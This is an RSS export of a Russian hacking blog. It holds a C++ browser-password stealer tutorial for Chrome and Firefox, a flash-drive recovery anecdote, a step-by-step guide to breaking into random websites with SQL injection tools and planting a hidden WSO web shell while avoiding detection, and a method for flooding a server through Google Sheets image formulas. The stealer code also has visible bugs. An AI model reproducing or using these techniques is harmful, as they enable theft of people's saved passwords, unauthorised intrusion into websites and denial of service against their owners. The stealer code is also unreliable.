<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>TORION</title><generator>teletype.in</generator><description><![CDATA[TORION]]></description><link>https://teletype.in/@torion?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=torion</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/torion?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/torion?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Wed, 22 Apr 2026 08:37:43 GMT</pubDate><lastBuildDate>Wed, 22 Apr 2026 08:37:43 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@torion/B1wpoqeMN</guid><link>https://teletype.in/@torion/B1wpoqeMN?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=torion</link><comments>https://teletype.in/@torion/B1wpoqeMN?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=torion#comments</comments><dc:creator>torion</dc:creator><title>Пишем стиллер. Как вытащить пароли Chrome и Firefox своими руками</title><pubDate>Mon, 07 Jan 2019 09:28:30 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/7a/7a2eac07-6394-4a9c-a416-f16e3ee1aa96.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/99/99441709-51b6-48f2-a862-d8ccbe67a709.jpeg"></img>Ты наверняка слышал о таком классе зловредных приложений, как стилеры. Их задача — вытащить из системы жертвы ценные данные, в первую очередь — пароли. В этой статье я расскажу, как именно они это делают, на примере извлечения паролей из браузеров Chrome и Firefox и покажу примеры кода на C++.]]></description><content:encoded><![CDATA[
  <figure class="m_custom">
    <img src="https://teletype.in/files/99/99441709-51b6-48f2-a862-d8ccbe67a709.jpeg" width="1900" />
  </figure>
  <p>Ты наверняка слышал о таком классе зловредных приложений, как стилеры. Их задача — вытащить из системы жертвы ценные данные, в первую очередь — пароли. В этой статье я расскажу, как именно они это делают, на примере извлечения паролей из браузеров Chrome и Firefox и покажу примеры кода на C++.</p>
  <h2><strong>WARNING</strong></h2>
  <p>Весь код в статье приводится исключительно в образовательных целях и для восстановления собственных утерянных паролей. Похищение чужих учетных или других личных данных без надлежащего письменного соглашения карается по закону.</p>
  <p>Итак, браузеры, в основе которых лежит Chrome или Firefox, хранят логины и пароли пользователей в зашифрованном виде в базе SQLite. Эта СУБД компактна и распространяется бесплатно по свободной лицензии. Так же, как и рассматриваемые нами браузеры: весь их код открыт и хорошо документирован, что, несомненно, поможет нам.</p>
  <p>В примере модуля стилинга, который я приведу в статье, будет активно использоваться CRT и другие сторонние библиотеки и зависимости, типа sqlite.h. Если тебе нужен компактный код без зависимостей, придется его немного переработать, избавившись от некоторых функций и настроив компилятор должным образом. Как это сделать, я показывал в статье «<a href="https://xakep.ru/2018/12/06/hidden-winapi/" target="_blank">Тайный WinAPI. Как обфусцировать вызовы WinAPI в своем приложении</a>».</p>
  <h3><strong>Что скажет антивирус?</strong></h3>
  <p>Рекламируя свои продукты, вирусописатели часто обращают внимание потенциальных покупателей на то, что в данный момент их стилер не «палится» антивирусом.</p>
  <p>Тут надо понимать, что все современные и более-менее серьезные вирусы и трояны имеют модульную структуру, каждый модуль в которой отвечает за что-то свое: один модуль собирает пароли, второй препятствует отладке и эмуляции, третий определяет факт работы в виртуальной машине, четвертый проводит обфускацию вызовов WinAPI, пятый разбирается со встроенным в ОС файрволом.</p>
  <p>Так что судить о том, «палится» определенный метод антивирусом или нет, можно, только если речь идет о законченном «боевом» приложении, а не по отдельному модулю.</p>
  <h2><strong>Chrome</strong></h2>
  <p>Начнем с Chrome. Для начала давай получим файл, где хранятся учетные записи и пароли пользователей. В Windows он лежит по такому адресу:</p>
  <pre>C:\Users\%username%\AppData\Local\Google\Chrome\UserData\Default\Login Data
</pre>
  <p>Чтобы совершать какие-то манипуляции с этим файлом, нужно либо убить все процессы браузера, что будет бросаться в глаза, либо куда-то скопировать файл базы и уже после этого начинать работать с ним.</p>
  <p>Давай напишем функцию, которая получает путь к базе паролей Chrome. В качестве аргумента ей будет передаваться массив символов с результатом ее работы (то есть массив будет содержать путь к файлу паролей Chrome).</p>
  <pre>#define CHROME_DB_PATH  &quot;\\Google\\Chrome\\User Data\\Default\\Login Data&quot;

bool get_browser_path(char * db_loc, int browser_family, const char * location) {
    memset(db_loc, 0, MAX_PATH);
    if (!SUCCEEDED(SHGetFolderPath(NULL, CSIDL_LOCAL_APPDATA, NULL, 0, db_loc))) {
        return 0;
    }

    if (browser_family = 0) {
        lstrcat(db_loc, TEXT(location));
        return 1;
    }
}
</pre>
  <p>Вызов функции:</p>
  <pre>char browser_db[MAX_PATH];
get_browser_path(browser_db, 0, CHROME_DB_PATH);
</pre>
  <p>Давай вкратце поясню, что здесь происходит. Мы сразу пишем эту функцию, подразумевая будущее расширение. Один из ее аргументов — поле <code>browser_family</code>, оно будет сигнализировать о семействе браузеров, базу данных которых мы получаем (то есть браузеры на основе Chrome или Firefox).</p>
  <p>Если условие <code>browser_family = 0</code> выполняется, то получаем базу паролей браузера на основе Chrome, если <code>browser_family = 1</code> — Firefox. Идентификатор <code>CHROME_DB_PATH</code>указывает на базу паролей Chrome. Далее мы получаем путь к базе при помощи функции <code>SHGetFolderPath</code>, передавая ей в качестве аргумента <code>CSIDL</code> значение <code>CSIDL_LOCAL_APPDATA</code>, которое означает:</p>
  <pre>#define CSIDL_LOCAL_APPDATA 0x001c // &lt;user name&gt;\Local Settings\Applicaiton Data (non roaming)
</pre>
  <p>Функция <code>SHGetFolderPath</code> устарела, и в Microsoft рекомендуют использовать вместо нее <code>SHGetKnownFolderPath</code>. Проблема в том, что поддержка этой функции начинается с Windows Vista, поэтому я применил ее более старый аналог для сохранения обратной совместимости. Вот ее прототип:</p>
  <pre>HRESULT SHGetFolderPath(      
    HWND hwndOwner,
    int nFolder,
    HANDLE hToken,
    DWORD dwFlags,
    LPTSTR pszPath
);
</pre>
  <p>После этого функция <code>lstrcat</code> совмещает результат работы <code>SHGetFolderPath</code> с идентификатором <code>CHROME_DB_PATH</code>.</p>
  <p>База паролей получена, теперь приступаем к работе с ней. Как я уже говорил, это база данных SQLite, работать с ней удобно через SQLite API, которые подключаются с заголовочным файлом sqlite3.h. Давай скопируем файл базы данных, чтобы не занимать его и не мешать работе браузера.</p>
  <pre>int status = CopyFile(browser_db, TEXT(&quot;.\\db_tmp&quot;), FALSE);
if (!status) {
    // return 0;
}
</pre>
  <p>Теперь подключаемся к базе командой <code>sqlite3_open_v2</code>. Ее прототип:</p>
  <pre>int sqlite3_open_v2(
    const char *filename,   /* Database filename (UTF-8) */
    sqlite3 **ppDb,         /* OUT: SQLite db handle */
    int flags,              /* Flags */
    const char *zVfs        /* Name of VFS module to use */
);
</pre>
  <p>Первый аргумент — наша база данных; информация о подключении возвращается во второй аргумент, дальше идут флаги открытия, а четвертый аргумент определяет интерфейс операционной системы, который должен использовать это подключение к базе данных, в нашем случае он не нужен. Если эта функция отработает корректно, возвращается значение <code>SQLITE_OK</code>, в противном случае возвращается код ошибки.</p>
  <pre>sqlite3 *sql_browser_db = NULL;

status = sqlite3_open_v2(TEMP_DB_PATH, 
                &amp;sql_browser_db, 
                SQLITE_OPEN_READONLY, 
                NULL);
if(status != SQLITE_OK) {
    sqlite3_close(sql_browser_db);
    DeleteFile(TEXT(TEMP_DB_PATH));
}
</pre>
  <h2><strong>INFO</strong></h2>
  <p>Обрати внимание: при некорректной отработке функции нам все равно необходимо самостоятельно закрыть подключение к базе и удалить ее копию.</p>
  <p>Теперь начинаем непосредственно обрабатывать данные в базе. Для этого воспользуемся функцией <code>sqlite3_exec()</code>.</p>
  <pre>status = sqlite3_exec(sql_browser_db, 
            &quot;SELECT origin_url, username_value, password_value FROM logins&quot;, 
            crack_chrome_db, 
            sql_browser_db, 
            &amp;err);
if (status != SQLITE_OK)
    return 0;
</pre>
  <p>Эта функция имеет такой прототип:</p>
  <pre>int sqlite3_exec(
    sqlite3*,                                  /* An open database */
    const char *sql,                           /* SQL to be evaluated */
    int (*callback)(void*,int,char**,char**),  /* Callback function */
    void *,                                    /* 1st argument to callback */
    char **errmsg                              /* Error msg written here */
);
</pre>
  <p>Первый аргумент — наша база паролей, второй — это команда SQL, которая вытаскивает URL файла, логин, пароль и имя пользователя, третий аргумент — это функция обратного вызова, которая и будет расшифровывать пароли, четвертый — передается в нашу функцию обратного вызова, ну а пятый аргумент сообщает об ошибке.</p>
  <p>Давай остановимся подробнее на callback-функции, которая расшифровывает пароли. Она будет применяться к каждой строке из выборки нашего запроса <code>SELECT</code>. Ее прототип — <code>int (*callback)(void*,int,char**,char**)</code>, но все аргументы нам не понадобятся, хотя объявлены они должны быть. Саму функцию назовем <code>crack_chrome_db</code>, начинаем писать и объявлять нужные переменные:</p>
  <pre>int crack_chrome_db(void *db_in, int arg, char **arg1, char **arg2) {

DATA_BLOB data_decrypt, data_encrypt;
sqlite3 *in_db = (sqlite3*)db_in;
BYTE *blob_data = NULL;
sqlite3_blob *sql_blob = NULL;

char *passwds = NULL;

while (sqlite3_blob_open(in_db, &quot;main&quot;, &quot;logins&quot;, &quot;password_value&quot;, count++, 0, &amp;sql_blob) != SQLITE_OK &amp;&amp; count &lt;= 20 );
</pre>
  <p>В этом цикле формируем BLOB (то есть большой массив двоичных данных). Далее выделяем память, читаем блоб и инициализируем поля <code>DATA_BLOB</code>:</p>
  <pre>int sz_blob;
int result;

sz_blob = sqlite3_blob_bytes(sql_blob);
dt_blob = (BYTE *)malloc(sz_blob);

if (!dt_blob) {
    sqlite3_blob_close(sql_blob);
    sqlite3_close(in_db);
}

data_encrypt.pbData = dt_blob;
data_encrypt.cbData = sz_blob;
</pre>
  <p>А теперь приступим непосредственно к дешифровке. База данных Chrome зашифрована механизмом Data Protection Application Programming Interface (DPAPI). Суть этого механизма заключается в том, что расшифровать данные можно только под той учетной записью, под которой они были зашифрованы. Другими словами, нельзя стащить базу данных паролей, а потом расшифровать ее уже на своем компьютере. Для расшифровки данных нам потребуется функция <code>CryptUnprotectData</code>.</p>
  <pre>DPAPI_IMP BOOL CryptUnprotectData(
    DATA_BLOB                 *pDataIn,
    LPWSTR                    *ppszDataDescr,
    DATA_BLOB                 *pOptionalEntropy,
    PVOID                     pvReserved,
    CRYPTPROTECT_PROMPTSTRUCT *pPromptStruct,
    DWORD                     dwFlags,
    DATA_BLOB                 *pDataOut
);

if (!CryptUnprotectData(&amp;data_encrypt, NULL, NULL, NULL, NULL, 0, &amp;data_decrypt)) {
    free(dt_blob);
    sqlite3_blob_close(sql_blob);
    sqlite3_close(in_db);
}
</pre>
  <p>После этого выделяем память и заполняем массив <code>passwds</code> расшифрованными данными.</p>
  <pre>passwds = ( char *)malloc(data_decrypt.cbData + 1);
memset(passwds, 0, data_decrypt.cbData);

int xi = 0;
while (xi &lt; data_decrypt.cbData) {
    passwds[xi] = (char)data_decrypt.pbData[xi];
    ++xi;
}
</pre>
  <p>Собственно, на этом все! После этого <code>passwds</code> будет содержать учетные записи пользователей и URL. А что делать с этой информацией — вывести ее на экран или сохранить в файл и отправить куда-то его — решать тебе.</p>
  <h2><strong>Firefox</strong></h2>
  <p>Переходим к Firefox. Это будет немного сложнее, но мы все равно справимся!</p>
  <p>Для начала давай получим путь до базы данных паролей. Помнишь, в нашей универсальной функции <code>get_browser_path</code> мы передавали параметр <code>browser_family</code>? В случае Chrome он был равен нулю, а для Firefox поставим 1.</p>
  <pre>bool get_browser_path(char * db_loc, int browser_family, const char * location) {
    ...
    if (browser_family = 1) {
        memset(db_loc, 0, MAX_PATH);
        if (!SUCCEEDED(SHGetFolderPath(NULL, CSIDL_LOCAL_APPDATA, NULL, 0, db_loc))) {
            // return 0;
        }
</pre>
  <p>В случае с Firefox мы не сможем, как в Chrome, сразу указать путь до папки пользователя. Дело в том, что имя папки пользовательского профиля генерируется случайно. Но это ерундовая преграда, ведь мы знаем начало пути (<code>\\Mozilla\\Firefox\\Profiles\\</code>). Достаточно поискать в нем объект «папка» и проверить наличие в ней файла <code>\\logins.json</code>«. Именно в этом файле хранятся интересующие нас данные логинов и паролей. Разумеется, в зашифрованном виде. Реализуем все это в коде.</p>
  <pre>lstrcat(db_loc, TEXT(location));

// Объявляем переменные
const char * profileName = &quot;&quot;;
WIN32_FIND_DATA w_find_data;
const char * db_path = db_loc;

// Создаем маску для поиска функцией FindFirstFile
lstrcat((LPSTR)db_path, TEXT(&quot;*&quot;));

// Просматриваем, нас интересует объект с атрибутом FILE_ATTRIBUTE_DIRECTORY
HANDLE gotcha = FindFirstFile(db_path, &amp;w_find_data);

while (FindNextFile(gotcha, &amp;w_find_data) != 0){
    if (w_find_data.dwFileAttributes &amp; FILE_ATTRIBUTE_DIRECTORY) {
        if (strlen(w_find_data.cFileName) &gt; 2) {
            profileName = w_find_data.cFileName;
        }
    }
}
// Убираем звездочку :)
db_loc[strlen(db_loc) - 1] = &#x27;\0&#x27;;

lstrcat(db_loc, profileName); 

// Наконец, получаем нужный нам путь
lstrcat(db_loc, &quot;\\logins.json&quot;);

return 1;
</pre>
  <p>В самом конце переменная <code>db_loc</code>, которую мы передавали в качестве аргумента в нашу функцию, содержит полный путь до файла <code>logins.json</code>, а функция возвращает 1, сигнализируя о том, что она отработала корректно.</p>
  <p>Теперь получим хендл файла паролей и выделим память под данные. Для получения хендла используем функцию <code>CreateFile</code>, как советует MSDN.</p>
  <pre>DWORD read_bytes = 8192;
DWORD lp_read_bytes;

char *buffer = (char *)malloc(read_bytes);
HANDLE db_file_login = CreateFileA(original_db_location, 
                GENERIC_READ, 
                FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE, 
                NULL, OPEN_ALWAYS, 
                FILE_ATTRIBUTE_NORMAL,  
                NULL);

ReadFile(db_file_login, buffer, read_bytes, &amp;lp_read_bytes, NULL);
</pre>
  <p>Все готово, но в случае с Firefox все не будет так просто, как с Chrome, — мы не сможем просто получить нужные данные обычным запросом SELECT, да и шифрование не ограничивается одной-единственной функцией WinAPI.</p>
  <h3><strong>Network Security Services (NSS)</strong></h3>
  <p>Браузер Firefox активно использует функции <a href="https://developer.mozilla.org/ru/docs/NSS" target="_blank">Network Security Services</a> для реализации шифрования своей базы. Эти функции находятся в динамической библиотеке, которая лежит по адресу <code>C:\Program Files\Mozilla Firefox\nss3.dll</code>.</p>
  <p>Все интересующие нас функции нам придется получить из этой DLL. Сделать это можно стандартным образом, при помощи <code>LoadLibrary\GetProcAdress</code>. Код однообразный и большой, поэтому я просто приведу список функций, которые нам понадобятся:</p>
  <ul>
    <li><code>NSS_Init</code>;</li>
    <li><code>PL_Base64Decode</code>;</li>
    <li><code>PK11SDR_Decrypt</code>;</li>
    <li><code>PK11_Authenticate</code>;</li>
    <li><code>PK11_GetInternalKeySlot</code>;</li>
    <li><code>PK11_FreeSlot</code>.</li>
  </ul>
  <p>Это функции инициализации механизма NSS и расшифровки данных. Давай напишем функцию расшифровки, она небольшая. Я добавлю комментарии, чтобы все было понятно.</p>
  <pre>char * data_uncrypt(std::string pass_str) {
    // Объявляем переменные
    SECItem crypt;  
    SECItem decrypt;
    PK11SlotInfo *slot_info;

    // Выделяем память для наших данных
    char *char_dest = (char *)malloc(8192); 
    memset(char_dest, NULL, 8192);
    crypt.data = (unsigned char *)malloc(8192);
    crypt.len = 8192;
    memset(crypt.data, NULL, 8192);

    // Непосредственно расшифровка функциями NSS
    PL_Base64Decode(pass_str.c_str(), pass_str.size(), char_dest);
    memcpy(crypt.data, char_dest, 8192);
    slot_info = PK11_GetInternalKeySlot();
    PK11_Authenticate(slot_info, TRUE, NULL);
    PK11SDR_Decrypt(&amp;crypt, &amp;decrypt, NULL);
    PK11_FreeSlot(slot_info);

    // Выделяем память для расшифрованных данных
    char *value = (char *)malloc(decrypt.len);
    value[decrypt.len] = 0;
    memcpy(value, decrypt.data, decrypt.len);

    return value;
}
</pre>
  <p>Теперь осталось парсить файл logins.json и применять нашу функцию расшифровки. Для краткости кода я буду использовать <a href="https://msdn.microsoft.com/ru-ru/library/bb982727.aspx" target="_blank">регулярные выражения</a> и их <a href="https://msdn.microsoft.com/ru-ru/library/bb982382.aspx" target="_blank">возможности в C++ 11</a>.</p>
  <pre>string decode_data = buffer;

// Определяем регулярную последовательность для сайтов, логинов и паролей
regex user(&quot;\&quot;encryptedUsername\&quot;:\&quot;([^\&quot;]+)\&quot;&quot;);
regex passw(&quot;\&quot;encryptedPassword\&quot;:\&quot;([^\&quot;]+)\&quot;&quot;);
regex host(&quot;\&quot;hostname\&quot;:\&quot;([^\&quot;]+)\&quot;&quot;);

// Объявим переменную и итератор
smatch smch;
string::const_iterator pars(decode_data.cbegin());

// Парсинг при помощи regex_search, расшифровка данных нашей функцией data_uncrypt
// и вывод на экран расшифрованных данных
do {
    printf(&quot;Site\t: %s&quot;, smch.str(1).c_str());
    regex_search(pars, decode_data.cend(), smch, user);
    printf(&quot;Login: %s&quot;, data_uncrypt(smch.str(1)));

    regex_search(pars, decode_data.cend(), smch, passw);
    printf(&quot;Pass: %s&quot;,data_uncrypt( smch.str(1)));

    pars += smch.position() + smch.length();

} while (regex_search(pars, decode_data.cend(), smch, host));
</pre>
  <h2><strong>Заключение</strong></h2>
  <p>Мы разобрались, как хранятся пароли в разных браузерах, и узнали, что нужно делать, чтобы их извлечь. Можно ли защититься от подобных методов восстановления сохраненных паролей? Да, конечно. Если установить в браузере мастер-пароль, то он выступит в качестве криптографической соли для расшифровки базы данных паролей. Без ее знания восстановить данные будет невозможно.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@torion/ByBUs9xG4</guid><link>https://teletype.in/@torion/ByBUs9xG4?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=torion</link><comments>https://teletype.in/@torion/ByBUs9xG4?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=torion#comments</comments><dc:creator>torion</dc:creator><title>Восстановление данных из пустого места</title><pubDate>Mon, 07 Jan 2019 09:26:37 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/b2/b2e4ebe9-cc35-453a-92a9-9e652eabdf17.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/64/64b12140-bf48-4485-820e-0fc7b44f48c8.jpeg"></img>А интересен он тем, что из полностью обнулённой USB флешки, мы удачно восстановили данные. Если интересно как? Добро пожаловать под кат…]]></description><content:encoded><![CDATA[
  <figure class="m_custom">
    <img src="https://teletype.in/files/64/64b12140-bf48-4485-820e-0fc7b44f48c8.jpeg" width="1900" />
  </figure>
  <p>А интересен он тем, что из полностью обнулённой USB флешки, мы удачно восстановили данные. Если интересно как? Добро пожаловать под кат…</p>
  <p>Предложение отформатировать накопитель Windows выдаёт в тех случаях, когда не может определить на устройстве файловую структуру, вот и предлагает создать новую, путём форматирования.</p>
  <p>В нашем случае нужны данные и форматировать нельзя. Смотрим дисковым редактором, что же случилось с файловой структурой.</p>
  <p>WinHex:</p>
  <figure class="m_custom">
    <img src="https://habrastorage.org/webt/8x/5b/o6/8x5bo6tu17ksmomybcpfho-egoo.jpeg" width="935" />
  </figure>
  <p>Опаньки… Все! Все 32 гигабайта «залиты» нулями… Данных нет! Шеф, всё пропало.</p>
  <p>Сразу спрашиваем клиента, не давал ли кому? и тот злобный товарищ не запускал ли утилиты ремонта? Ответ: Нет, сразу к вам.</p>
  <p>Если флешку ни кто не «прошивал» и не записывал её паттерном, то не могла же она в миг обнулиться, на это требуется время и действие.</p>
  <figure class="m_custom">
    <img src="https://habrastorage.org/webt/nx/84/h8/nx84h86mehrnwqqf8stskntfwzm.jpeg" width="3111" />
  </figure>
  <p>Ок, русские не сдаются. Спаяем микросхему и посмотрим содержимое памяти напрямую, в обход контроллера. В данном случае в одном корпусе два кристалла, Вместе со служебной информацией получается два дампа по 18гб.</p>
  <figure class="m_custom">
    <img src="https://habrastorage.org/webt/gm/ex/0n/gmex0np1wzwp8frf9ch-s5zvidg.jpeg" width="935" />
  </figure>
  <p>В дампе не нули, но это ещё ни о чём не говорит, так как на современных флешках контроллер пишет данные не в явном виде, а через XOR операцию.</p>
  <p>Если все блоки одинаковы, то да, накопитель залит одним и тем же. Но нам повезло они разные, а это данные!</p>
  <p>Нужно подобрать ксор, и собрать блоки в нужной последовательности по алгоритму контроллера.</p>
  <figure class="m_custom">
    <img src="https://habrastorage.org/webt/ba/dj/ni/badjnivfbgqnsi0icdghy6rlrsg.jpeg" width="2625" />
  </figure>
  <p>Пошаманим ростовским комплексом</p>
  <figure class="m_custom">
    <img src="https://habrastorage.org/webt/_m/c_/c6/_mc_c6pz6ssxg7vigtccanpxs-i.jpeg" width="1439" />
  </figure>
  <p>И вауля, 26 гигабайт данных, 9000 файлов, битых из них 900. К сожалению картинку с данными мы не имеем права выкладывать, так как у нас в конторе конфиденциальность превыше всего.</p>
  <p>В заключении этой мини истории со счастливым концом (клиент сначала расстроился, что там одни нули), нужно написать почему не все файлы корректно восстановились.</p>
  <p>Качество современных чипов памяти весьма печальное, и несмотря на громогласные заявления производителей о том, что вот мы сделали огромное количество циклов записи… статистика показывает обратное. Износ происходит очень быстро, по сравнению с флешками которые измерялись мегабайтами. Ну не будем об этом здесь и сейчас.</p>
  <p>Касательно этого случая, флешка умирала и «сигнализировала» об этом косвенным путём, а именно: запускалась проверка диска, результат работы чекдиска — папка FOUND, в восстановленных данных присутствует. Это уже были первые звоночки, что она «сыпется».</p>
  <p>Контроллер увидел, что количество плохих ячеек памяти уже огромное и сделал такой «финт ушами» как, отдача в интерфейс нулей.</p>
  <p>Нам же пришлось вычитывать битые сектора, многократным чтением, какие-то из них удалось прочитать или восстановить из ECC. Как результат – клиент доволен. А начиналось то всё, с пустого места…</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@torion/H1jbm0kfN</guid><link>https://teletype.in/@torion/H1jbm0kfN?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=torion</link><comments>https://teletype.in/@torion/H1jbm0kfN?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=torion#comments</comments><dc:creator>torion</dc:creator><title>Простейший взлом сайтов</title><pubDate>Sun, 06 Jan 2019 19:12:03 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/7a/7a2eac07-6394-4a9c-a416-f16e3ee1aa96.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/99/99441709-51b6-48f2-a862-d8ccbe67a709.jpeg"></img>Статья написана для тех, для кого хакер - это человек, у которого на мониторе бегают зелёные циферки. Что-нибудь серьезное взломать этим методом не получится, ну или получится.]]></description><content:encoded><![CDATA[
  <figure class="m_custom">
    <img src="https://teletype.in/files/99/99441709-51b6-48f2-a862-d8ccbe67a709.jpeg" width="1900" />
  </figure>
  <p>Статья написана для тех, для кого хакер - это человек, у которого на мониторе бегают зелёные циферки. Что-нибудь серьезное взломать этим методом не получится, ну или получится.</p>
  <p>Подготовка.</p>
  <p>1. Инструментарий.</p>
  <p>Нам потребуется всего 3 из множества. Более того, подойдут даже демо-версии:</p>
  <p>а) Xspider - сканирует сервер и сайт на открытые порты и по своей базе уязвимостей. Демо-версия не пишет где именно они были найдены, но отвечает на жопу что они есть. Нам этого достаточно.</p>
  <p>б) Havij - так как мы будем взламывать онли через sql-inj, то лучше не найти. Тут лучше кряк поискать ибо не все базы во фришной версии поддерживаются, благо, кряки гуглятся мгновенно.</p>
  <p>в) WSO 2.5.1 (web shell). Чтобы то, чем вы занимаетесь выглядело как настоящее хакерство.</p>
  <p>2. Защита жопы.</p>
  <p>Это на вкус и цвет, vpn + прокси хватает вполне. Если не будет дефейсов/удаления/прочих неприятных/видимых админу штук, то вас, скорее всего, даже не заметят.</p>
  <p>3. Поехали.</p>
  <p>Ищем цель, тут всё просто. Пишите в гугле любое слово и жмёте искать. Берёте нужный сайт и засовываете в Xspider, жмёте сканировать. Попутно идёте на 2ip.ru например и ищете сайты-соседушки вашего уже почти взломанного сайта с баблом. Хватаете их и закидываете в Хспайдер тоже. Ждём...</p>
  <p>Предположим Xspider справился и нашёл что-то. Открываем засранца и смотрим что у нас там в 80 / tcp - HTTP. Ура! Там SQL-inj написано красненьким. Нам сегодня везёт, продолжаем.</p>
  <p>Так как он не пишет где же эта скуля нашлась мы спросим у гугла. Пишем запрос:</p>
  <p>site:жертва.ру inurl:=</p>
  <p>Нам покажутся все ссылки с параметрами</p>
  <p>Они-то нам и нужны.</p>
  <p>33% сделано.</p>
  <p>Запускаем Havij.</p>
  <p>В target вписываем ссылочку как в примере. Она должна быть похожа на ту, которой с нами поделился достопочтенный Гугол.</p>
  <p>Ничего больше нажимать не надо, пусть этим занимаются те, кому не насрать. Жмём Analyze. Заработало! Буковки побежали. Для большего эффекта поставьте полноэкранный режим. Если ничего не получилось, то хер с ним, этот сайт не достоин нашего внимания идём дальше. Если получилось и db found, то во вкладке tables жмём поочереди слева направо кнопки гет дб, гет таблес (плохая память но что-то в этом духе). Теперь ищем что-нибудь похожее на user, admin, и т.д. Открываем их, ставим галочки на чём-нибудь похожем на login, pass и далее Get Data.</p>
  <p>Если вам повезёт, вы получите сразу и логин и пароль. Но обычно пароль шифруется</p>
  <p>и нам приходится идти к нашему другу Гуглу и тупо вбиваем хэш в него. Вот тут немного полазим и поищем его, в огромных списках быстрее будет нажать Ctrl+F и туда уже засунуть пароль.</p>
  <p>Итак. У нас есть логин и пароль админа. Что дальше? Открываем Havij и жмём на кнопочку Find Admin там только одна графа и одна кнопка, так что разберётесь.</p>
  <p>4. Админка.</p>
  <p>На этом можно, в принципе, остановиться. Но нас достижение цели не останавливает и мы хотим больше. Сейчас будет мало конкретики ибо видов разных админок долбаная куча. Ищите в админке любой способ загрузки файла, а лучше файл-менеджер и загружаете наш WSO шелл. ВАЖНО. посмотрите в какую папку происходят загрузки или в какую вы его загружаете, меняется ли имя и тд. В общем, нам нужен его конкретный адрес, на который мы заходим и в окне пароля пишем root. Вы восхитительны и перед вами внутренности сайта, можете веселиться, сливать базы, лазать-копаться и т.д. Опционально перезалейте и переименуйте шелл куда-нибудь, где он будет не особо заметен.</p>
  <p>--</p>
  <p>Если что-то на любой стадии не получается, то просто ищем другую жертву и заново. Когда-нибудь точно получится.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@torion/HJYhG0kzN</guid><link>https://teletype.in/@torion/HJYhG0kzN?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=torion</link><comments>https://teletype.in/@torion/HJYhG0kzN?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=torion#comments</comments><dc:creator>torion</dc:creator><title>DDOS атака с помощью Google Spreadsheet</title><pubDate>Sun, 06 Jan 2019 19:10:40 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/b2/b2e4ebe9-cc35-453a-92a9-9e652eabdf17.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/64/64b12140-bf48-4485-820e-0fc7b44f48c8.jpeg"></img>Google использует своего «паука» FeedFetcher для кэширования любого контента в Google Spreadsheet, вставленного через формулу =image(«link»).]]></description><content:encoded><![CDATA[
  <figure class="m_custom">
    <img src="https://teletype.in/files/64/64b12140-bf48-4485-820e-0fc7b44f48c8.jpeg" width="1900" />
  </figure>
  <p>Google использует своего «паука» FeedFetcher для кэширования любого контента в Google Spreadsheet, вставленного через формулу =image(«link»).</p>
  <p><a href="https://docs.google.com/spreadsheet/" target="_blank">https://docs.google.com/spreadsheet/</a></p>
  <p>Например, если в одну из клеток таблицы вставить формулу</p>
  <p>Код:</p>
  <p>=image(&quot;http://example.com/image.jpg&quot;)</p>
  <p>Google отправит паука FeedFetcher скачать эту картинку и закэшировать для дальнейшего отображения в таблице.</p>
  <p>Однако, если добавлять случайный параметр к URL картинки, FeedFetcher будет скачивать её каждый раз заново. Скажем, для примера, на сайте жертвы есть PDF-файл размером в 10 МБ. Вставка подобного списка в таблицу приведет к тому, что паук Google скачает один и тот же файл 1000 раз!</p>
  <p>Код:</p>
  <p>=image(&quot;http://targetname/file.pdf?r=1&quot;)</p>
  <p>=image(&quot;http://targetname/file.pdf?r=2&quot;)</p>
  <p>=image(&quot;http://targetname/file.pdf?r=3&quot;)</p>
  <p>=image(&quot;http://targetname/file.pdf?r=4&quot;)</p>
  <p>...</p>
  <p>=image(&quot;http://targetname/file.pdf?r=1000&quot;)</p>
  <p>Все это может привести к исчерпанию лимита трафика у некоторых владельцев сайтов. Кто угодно, используя лишь браузер с одной открытой вкладкой, может запустить массированную HTTP GET FLOOD-атаку на любой веб-сервер.</p>
  <p>Атакующему даже необязательно иметь быстрый канал. Поскольку в формуле используется ссылка на PDF-файл (т.е. не на картинку, которую можно было бы отобразить в таблице), в ответ от сервера Google атакующий получает только N/A. Это позволяет довольно просто многократно усилить атаку [Аналог DNS и NTP Amplification – прим. переводчика], что представляет серьезную угрозу.</p>
  <p>С использованием одного ноутбука с несколькими открытыми вкладками, просто копируя-вставляя списки ссылок на файлы по 10 МБ, паук Google может скачивать этот файл со скоростью более 700 Мбит/c.</p>
  <p>В моем случае, это продолжалось в течение 30-45 минут, до тех пор, пока я не вырубил сервер. Если я все правильно подсчитал, за 45 минут ушло примерно 240GB трафика.</p>

